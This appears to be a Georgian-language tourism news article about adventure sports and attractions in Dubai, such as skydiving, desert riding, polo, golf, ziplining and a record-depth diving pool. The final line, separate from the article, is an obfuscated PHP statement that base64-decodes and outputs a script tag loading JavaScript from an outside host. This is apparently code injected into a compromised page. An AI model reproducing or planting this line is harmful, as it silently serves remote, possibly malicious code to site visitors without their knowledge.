celsiusi
ავერსი საქკაბელი

თვითმფრინავიდან 4000 მეტრი სიმაღლიდან გადმოხტომა, მკვეთრად დახრილ ქვიშიან ფერდობზე თხილამურებით სრიალი, იპოდრომზე ცხენით განავარდება თუ წმინდა სისხლის არაბული ულაყით უდაბნოში ჯირითი, დუბაი - ის ქალაქია, სადაც ამ მძაფრ შთაბეჭდილებებს წლის ნებისმიერ სეზონზე მიიღებთ. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს დუბაის ეკონომიკისა და ტურიზმის დეპარტამენტიდან აცნობეს. 

 

იმის მიუხედავად, ხართ თუ არა ადრენალინ-დამოკიდებული, თავგადასავლის მაძიებელი, თუ უბრალოდ,  ბუნებით ტკბობა გიყვართ, დუბაი სრულყოფილ საასპარეზო მოედანს გთავაზობთ, თავისი უდაბნოებით, ციცაბო მთებით, სპარსეთის ყურის დიდებული წყლებით და შესანიშნავი სპორტული ობიექტებით. 

 

Large 20230109 DUBAI TOURISM SHOT 5 00641

ჩოგბურთის გულშემატკივრებისთვის  ის კორტებია ღია, სადაც ნოვაკ ჯოკოვიჩმა დუბაის Duty Free ჩოგბურთის ჩემპიონატზე მამაკაცთა შორის ღია პირველობა მოიგო.
 
მოცურავეებისთვის, რომლებსაც ოლიმპიური სიგრძის გაცურვა სურთ, ჰამდანის სპორტულ კომპლექსში მდებარე ის აუზია ღია, რომელიც 2019 წლის მსოფლიო სპეციალურ ოლიმპიურ თამაშებს მასპინძლობდა.
 
გოლფის მოთამაშეებს, პროფესიონალთა მსგავსად შეუძლიათ ქალაქის საჩემპიონო, 18 ფოსოიან მოედანზე თამაში.
 
დუბაის მარათონი მთავარი მოვლენაა ქალაქის სპორტულ კალენდარში, რომელიც ყოველწლიურად ათასობით მორბენალსა და მაყურებელს იზიდავს. ისევე, როგორც 42,195 კმ მარათონში, ბევრი მონაწილე ამჯობინებს ასპარეზობას 10 კმ მანძილზე, ან 4 კმ მანძილზე - გასართობად.
 
მსოფლიო დონის სპორტული ღონისძიებები Emirates Dubai 7s სასტუმროში მთელი წლის განმავლობაში იმართება. რაგბის მსოფლიო ჩემპიონატზე The Sevens Stadium-ზე რაგბის საუკეთესო შვიდკაცა გუნდებს იხილავთ მთელი მსოფლიოდან, ავსტრალიიდან, ახალი ზელანდიიდან, სამხრეთ აფრიკისა და ფიჯიდანაც კი.
 
დუბაი გოლფის გლობალურ ტურისტულ მიმართულებად გადაიქცა როგორც პროფესიონალებისთვის, ასევე მოყვარულებისთვის. ქალაქი, მსოფლიო დონის გოლფის მოედნებით, ისეთ დიდ ღონისძიებებს მასპინძლობს, როგორიცაა DP World Tour (ევროპული ტური). Emirates Golf Club-ში მდებარე ქალაქის ერთ-ერთი ყველაზე ცნობილი მოედანი - მეჯლისი ყოველწლიურად მასპინძლობს  Hero Dubai Desert Classic ტურნირს. გოლფის მოყვარულებს შეუძლიათ Fairways Jumeirah Golf Estates-ში ითამაშონ, რომელიც DP მსოფლიო ჩემპიონატის მასპინძელია. სწრაფი თამაში (ცხრა ფოსოიანი მოედანზე) შესაძლებელია Meydan Golf-ში ან JA The Resort-ში ჯებელ ალიში.
 
დუბაი ასევე  უახლესი იპოდრომით არის ცნობილი, სადაც ყოველწლიურად დუბაის მსოფლიო თასი იმართება დოღში. მასპინძლობს რა მსოფლიოში წამყვან ჟოკეებსა და ცხენებს, ეს 80000-ანი ტევადობის ადგილი თითქმის ფუტურისტულ სტილშია. როგორც დუბაის მსოფლიო თასის გამარჯვებულმა ჟოკეიმ ფრენკი დეტორიმ ერთხელ აღნიშნა: „როდესაც [მაიდანის იპოდრომზე] შუქს ანთებენ, გეგონება, ვარსკვლავური ომების კოსმოსური ხომალდი დაეშვა“.
 
ვისაც ცხენის ტარება დამოუკიდებლად სურს, შეუძლია ქალაქის ნებისმიერ საცხენოსნო ობიექტს მიმართოს, როგორიცაა Emirates Equestrian Center ან Jebel Ali Equestrian Club.
 
უდაბნო ცხენოსნობის ნამდვილ გამოცდილებას გთავაზობთ. მხედრებს შეუძლიათ ქვიშის დიუნებზე იჯირითონ და უყურონ, თუ როგორ იცვლის მზის ჩასვლისას ქვიშა ფერს წითლიდან ოქროსფრისკენ. ალ საჰრას უდაბნოს კურორტის საცხენოსნო ცენტრი ან ალ ჯიადის თავლები ის ორად ორი ადგილია, რომლებიც უდაბნოს ამ შესანიშნავ გამოცდილებას გთავაზობთ.
 
ცხენოსნობისას ადრენალინის ასამაღლებლად პოლო შეუდარებელია. "მეფეების სპორტი" ახალბედა მხედრებსაც კი შეუძლიათ გამოცადონ ქალაქის ისეთ პოლო კლუბებში, როგორებიცაა Dubai Polo & Equestrian Club-ში, Arabian Ranches -ში და Al Habtoor Polo Resort და დუბაილენდის კლუბში, რომელიც Dubai Polo Gold Cup-ს მასპინძლობს.
 
აქლემების პოლო ამ სამეფო სპორტს არაბულ ელფერს სძენს. ეს სანახაობა უდაბნოს ტრასაზე Al Marmoom Heritage Village-ში ან Desert Safari-ზე - ერთ-ერთი ყველაზე პოპულარული თავგადასავალია დამსვენებლებისთვის. უდაბნოს მთელი დიდებულების ამგვარად განცდა დუბაის ნებისმიერი სტუმრისთვის რიტუალია.
 
შეგიძლიათ ასფალტი უკან მოიტოვოთ და მოძრავ დიუნებზე, 4x4 offroad ატრაქციონზე  გაეშუროთ. ქვიშის ზღვაში მანქანის გამავლობის მართვა - უნარებს, გამბედაობას და სისწრაფეს მოითხოვს.
 
სენდბორდინგისთვის (sand boarding) დუბაის "დიდი წითელი" დიუნისკენ უნდა გაემართოთ, დუბაის ყველაზე დიდი ქვიშის დიუნი 300 ფუტზე მაღალია და ჩამოსრიალებას განსაკუთრებულ ექსტრიმს მიიღებთ.
 
უდაბნო ყველაზე იდუმალი და მდუმარე ღამითაა. ვარსკვლავებიანი ცის ქვეშ დაბანაკება ის მოგონებაა, რომელიც მთელი ცხოვრება გაგყვებათ. კემპინგი ნამდვილი ბედუინების გამოცდილებაა, მაგრამ აუცილებლად დროულად გაიღვიძეთ, რომ დღის პირველი ბუნებრივი შოუ - მზის ამოსვლა არ გამოტოვოთ. უდაბნო ყვითელი, ნარინჯისფერი და ოქროსფერ ფერებით იფარება - ეს სანახაობა ყველაზე კარგად ასობით ფუტის სიმაღლიდან, დილის ნიავზე მოძრავი საჰაერო ბურთიდან უნდა ნახოთ. უდაბნოს სიმაღლიდან ყურებისას ნახავთ, თუ რამდენად დიდებული და ჯადოსნურია ეს პეიზაჟი.
 
უდაბნოზე სიმაღლიდან მიღებული კიდევ ერთი გამოცდილება, თუმცა ოდნავ უფრო სწრაფი - ეს სქაიდაივინგია. Skydive Dubai-ს უდაბნოს კამპუსში ერთწუთიანი თავისუფალი ვარდნის შემდეგ, მტვერი იფანტება და ქვიშის გასაოცარ ხედებს ათვალიერებთ. შეგიძლიათ აირჩიოთ არანაკლებ უნიკალური პალმა ჯუმეირას ხედი. პალმის ფორმის ხელოვნური არქიპელაგის ხედი ის გამოცდილებაა, რასაც "მხოლოდ დუბაიში" თუ მიიღებ.
 
  Skydive Dubai 3
ადრენალინის მაძიებლებს XLine Dubai Marina-ზე სხვა გზითაც შეუძლიათ ფრენა. X Dubai-ის მიერ შექმნილი მსოფლიოში ყველაზე გრძელი ურბანული ზიპლაინი ამავდროულად ერთ-ერთი ყველაზე ციცაბო და სწრაფია. ერთ კილომეტრზე 16 გრადუსიანი დახრილობით და 80 კმ/სთ საშუალო სიჩქარით, ზიპლაინზე შეძლებთ გაითავისუფლოთ თქვენი შინაგანი მე, დატკბეთ დუბაის მარინას ჰორიზონტით და მის მრავალ იახტასა და ცათამბჯენს შემოუფრინოთ. ატრაქციონს ორი ერთდროულად გაშვებული ზიპლაინი აქვს, რაც იმას ნიშნავს, რომ თქვენ შეგიძლიათ ეს გამოცდილება მეგობართან ერთად გაიზიაროთ. ამასთანავე, თქვენს მოძრაობებს და ემოციებს ჩაფხუტზე დამაგრებული GoPros კადრებზე აისახება. ამ ვიდეოს და ფოტოებს მოგონებად შეინახავთ.
 
იცხოვრე ზღვარზე და ეწვიე ატრაქციონს, რომელიც ქალაქის ღირსშესანიშნაობებს ახალ სიმაღლეებზე დააყენებს.  ტყუპ-კოშკიანი სასტუმრო Address Sky View-ს 52-ე და 53-ე სართულებიდან, მიწიდან 220 მეტრზე მეტ სიმაღლიდან შეგიძლია მიიღო Brave the Edge Walk (გაისეირნე ზღვარზე) და Sky Glass (ცის მინა) წარუშლელი შთაბეჭდილებები.
 
დაივინგის მოყვარულთათვის Deep Dive Dubai საუკეთესო ადგილია. რეკრეაციული ცენტრის 60 მ სიღრმის აუზი გინესის რეკორდების წიგნშია შესული, როგორც მსოფლიოში ყველაზე ღრმა საცურაო აუზი. აუზის ხამანწკის ფორმის დიზაინი დუბაის ისტორიულ მემკვიდრეობას გამოხატავს, რაც მარგალიტების ძიების ტრადიციასთანაა დაკავშირებული. გარდა გასაოცარი სიღრმისა, აუზს სხვა შეუდარებელი წყალქვეშა დანამატები აქვს, როგორიცაა „ჩაძირული ქალაქი“-თავისი მიტოვებული ქალაქური ქუჩებით.
 
ვისაც სიმშრალე ურჩევნია, ქალაქის დათვალიერება ორი ბორბლიდან კარგად ნაცადი ხერხია. ბოლო რამდენიმე წლის განმავლობაში დუბაიში ველოსიპედი სულ უფრო პოპულარული გახდა. განსაკუთრებით მას შემდეგ, რაც ქალაქს 104 კმ-ზე მეტი ველოსიპედის ბილიკი დაემატა, მათ შორის ალ ქუდრას ველოსიპედის ბილიკი (86 კმ), -ღამით ლამაზად განათებული ნად ალ შება ველოსიპედის პარკი რვა, ექვსი და ოთხი კილომეტრის სიგრძის ბილიკების არჩევანით, ასევე 68 კმ სიგრძის ლოლიპოპის ფორმის ბილიკი - სტრატეგიული.

334
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");